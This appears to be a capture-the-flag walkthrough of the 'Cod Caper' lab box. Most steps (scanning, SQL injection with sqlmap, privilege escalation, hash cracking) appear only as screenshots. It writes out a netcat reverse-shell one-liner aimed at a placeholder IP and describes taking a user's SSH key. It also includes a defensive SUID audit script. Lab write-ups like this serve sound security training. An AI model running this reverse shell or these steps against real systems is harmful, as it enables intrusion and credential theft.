# The Cod Caper

![](/files/-MeMqMSJqaPI58sY2oUS)

## Host Enumeration

Let's run an nmap scan to find open ports and the services running on them.

![](/files/-MeMrDd60OfUrngdpSE5)

![](/files/-MeMrNhMe6UFnHkq1_t0)

## Web Enumeration

Let's check the webpage.

![](/files/-MeMrZ4t8GIM0SkmrdVf)

It's a default Apache2 page, so let's run gobuster to find hidden files and directories.

![](/files/-MeMuj6i5h99D5cOrMdC)

![](/files/-MeMung_24Sx9yqGMHNO)

## Web Exploitation

Let's use sqlmap to find more information.

![](/files/-MeMzSVOTEVebw_Ub7Nw)

![](/files/-MeMzXlQGgVNIJg-zszv)

![](/files/-MeMzfLg-YYOz4uLSGSX)

## Command Execution

Let's check the administrator.php page and log in with the credentials we found.

![](/files/-MeR0py4WxpOAIUcPCAt)

Looks like we can run commands. Let's get a reverse shell on the machine. First, we start a netcat listener.

![](/files/-MeR17ToqnfiDdRW8GTu)

Now let's run the reverse shell command:

```
rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <Your-IP> 1234 >/tmp/f
```

![](/files/-MeR1O1F3a9fVGJ674KA)

We have a shell. Let's stabilize it.

![](/files/-MeR1oqKdN96cAn8hjSk)

Let's look at how many files are in the current directory.

![](/files/-MeR25u6UVMwsx-5H-TL)

![](/files/-MeR2AJKypLGmCu87fjF)

Let's check if pingu still has his account on this machine.

![](/files/-MeR2KkaO-ui0h8BxUJ-)

Looks like he does.

![](/files/-MeR2OjXoBmSRVrDZfLj)

Let's look for interesting files belonging to www-data.

![](/files/-MeR4FYLS756SDWgzXNg)

![](/files/-MeR4Kdmxx2mZguvhKO6)

Let's look at this interesting file.

![](/files/-MeR4TE969GIrQH8MAEZ)

Looks like a password.

![](/files/-MeR4lAQnnsNryT0dVt2)

Now let's go get pingu's private SSH key.

![](/files/-MeR2wBlEh80QXbVrLov)

Let's cat the contents of `id_rsa`, copy it to our machine, and call the file `id_rsa`.

Now let's set the permissions for the file and log in with the password we found.

![](/files/-MeR4gX3UhU_PD-9rBZd)

## LinEnum

![](/files/-MeR5EOcbSX6sul2V2ok)

Let's use the second method. First, on our machine, let's cd into the directory where the LinEnum file is located and then start an HTTP server on port 8000.

![](/files/-MeR5WcNkeBbjNPvy_c-)

Now let's go to the /tmp folder on the victim machine and download the file.

![](/files/-MeR5jQ7xpU-eCBfZNbl)

Now let's give it executable permissions and run the file.

![](/files/-MeR6UuQLDsvEZLNyzmJ)

Once we run the file we get a lot of information. Looking at the SUID files, we see an interesting one that is not common.

![](/files/-MeR6i3ku6E-X0d0UepQ)

![](/files/-MeR6odJHlWmdUEhYIz6)
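
The same "uncommon SUID file" finding can be produced on the defender's side by comparing the SUID binaries on a host against a reviewed baseline. This is an added example, not part of the original writeup; the function name `suid_audit` and the baseline file format (one absolute path per line) are assumptions of this example.

```shell
#!/bin/sh
# Added example: report setuid files that are not in a reviewed baseline.
# Assumed baseline format: one absolute path per line, e.g. /usr/bin/passwd.
# Build the baseline from a known-good image and keep it under change control.

# suid_audit ROOT BASELINE_FILE
# Prints every regular file under ROOT with the setuid bit set whose path
# does not appear as a whole line in BASELINE_FILE.
suid_audit() {
    root=$1
    baseline=$2

    if [ ! -r "$baseline" ]; then
        echo "suid_audit: cannot read baseline: $baseline" >&2
        return 2
    fi

    # -xdev         stay on one filesystem (skips /proc, network mounts)
    # -type f       regular files only
    # -perm -4000   setuid bit set, regardless of the other mode bits
    find "$root" -xdev -type f -perm -4000 2>/dev/null | sort |
    while IFS= read -r path; do
        # -F fixed string, -x whole-line match, -q quiet
        if ! grep -Fxq -- "$path" "$baseline"; then
            printf '%s\n' "$path"
        fi
    done
}

# Run as a script only when both arguments are given:
#   sh suid_audit.sh / /etc/security/suid-baseline.txt   (hypothetical path)
if [ "$#" -eq 2 ]; then
    suid_audit "$1" "$2"
fi
```

Any path this prints is a SUID binary nobody has reviewed, which is exactly the kind of file LinEnum surfaced here.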

## pwndbg

![](/files/-MeR7EcjZL7xDH4mKGnK)

![](/files/-MeR7YicRXN26MqfWIba)

![](/files/-MeR7nu3WxixF_Mc3eLE)

## Binary-Exploitation: Manually

![](/files/-MeR8BxeU5wOmjOzrMpY)

![](/files/-MeR8EpwT8BcSjZxZcnZ)

## Binary-Exploitation: The Pwntools way

![](/files/-MeR8iRh4BcRZO5hrLK2)

![](/files/-MeR8l_79HNYTA1yNR1r)

## Binary Exploitation

Let's use the manual way.

Let's cd into the /opt/secret directory and run the command to get the hash of the root user.

![](/files/-MeR988xC02mG5Gftgwm)

## Finishing The Job

We have the hash. Let's copy it, save it on our machine in a file called hash, and crack it using hashcat.

![](/files/-MeR9rI5s1Yyji6_VjWb)

![](/files/-MeRB44mkAtUnBUbNUXz)

We have the password.


